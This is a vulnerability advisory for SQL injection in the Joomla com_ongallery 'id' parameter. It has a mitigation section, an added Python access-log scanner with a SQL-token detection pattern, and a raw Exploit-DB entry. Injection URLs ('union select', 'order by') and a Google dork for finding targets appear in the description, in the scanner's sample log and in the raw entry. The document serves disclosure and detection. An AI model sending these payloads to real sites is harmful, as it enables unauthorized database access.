Vendor: N/A
By: _aL_Bayraqim_
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component (com_ongallery) SQL Injection Vulnerability

The 'id' parameter of the com_ongallery component (index.php?option=com_ongallery&task=ft&id=) is used in an SQL query without validation, so SQL appended to that parameter in the URL is passed through to the database. The advisory's examples are http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- and http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--

Mitigation:

Developers should validate and sanitize user-supplied input before it is used in SQL queries, and should use parameterized queries (prepared statements) rather than string concatenation, so that a value such as 'id' can never be interpreted as SQL.
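The validation side of that mitigation can also be applied to detection. The following Python is an added example, not part of the advisory or of the Exploit-DB entry: it reads web-server access log lines, picks out requests to com_ongallery, and flags any whose 'id' value is not a plain integer (the only shape the advisory's own examples suggest a gallery id should have). The log lines are constructed for the example.

```python
"""Flag com_ongallery requests whose 'id' is not a plain integer.
Added example; the access-log lines are constructed, not captured."""
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Request field of a common/combined log line: "GET /path?query HTTP/1.1"
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Tokens that only appear once SQL has been injected into the value
_SQL_TOKENS = re.compile(r"\b(union|select|order\s+by|sleep|benchmark)\b|--|/\*", re.I)

# Constructed sample: a benign request, the advisory's two payloads,
# the same payload sent to another component, and a percent-encoded variant
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php?option=com_ongallery&task=ft&id=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2020:10:00:03 +0000] "GET /index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?option=com_content&id=-1+union+select+1-- HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php?option=com_ongallery&task=ft&id=%2D1%20UNION%20SELECT%201%2D%2D HTTP/1.1" 200 512',
]


def classify_request(target: str) -> Optional[dict]:
    """Return a finding for a com_ongallery request with a non-integer 'id';
    None for benign requests or for requests to other components."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_ongallery":
        return None
    ids = params.get("id")
    if not ids:
        return None
    value = ids[0]  # parse_qs has already decoded '+' and %xx sequences
    if re.fullmatch(r"-?\d+", value.strip()):
        return None  # an integer is what the component expects here
    return {"param": "id", "value": value,
            "sql_tokens": bool(_SQL_TOKENS.search(value))}


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[int, dict]]:
    """Yield (line_number, finding) for every suspicious request in the log."""
    for number, line in enumerate(lines, 1):
        match = _REQUEST_RE.search(line)
        if match:
            finding = classify_request(match.group(1))
            if finding:
                yield number, finding
```

Because the check is on the shape of the value rather than on a signature, it also catches encodings and keyword variants the token list does not know; the sql_tokens flag is only there to prioritise findings.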

Exploit-DB raw data:

===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================

Author : _aL_Bayraqim_

Homepage : http://www.1923turk.com

BORDO BERELİLER GRUP KOMUTANLIGI

..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mücahit...!

===================================================
[+] G00gle Dork : index.php?option=com_ongallery

[+] Vulnerable File :

http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]

[+] ExploiT :

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--

http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--

===================================================
The martyr came, mortality is a lie; he went, immortality is the truth. You carcasses who go on living, who will resurrect you?..
===================================================

Greetz : 1923Turk All Users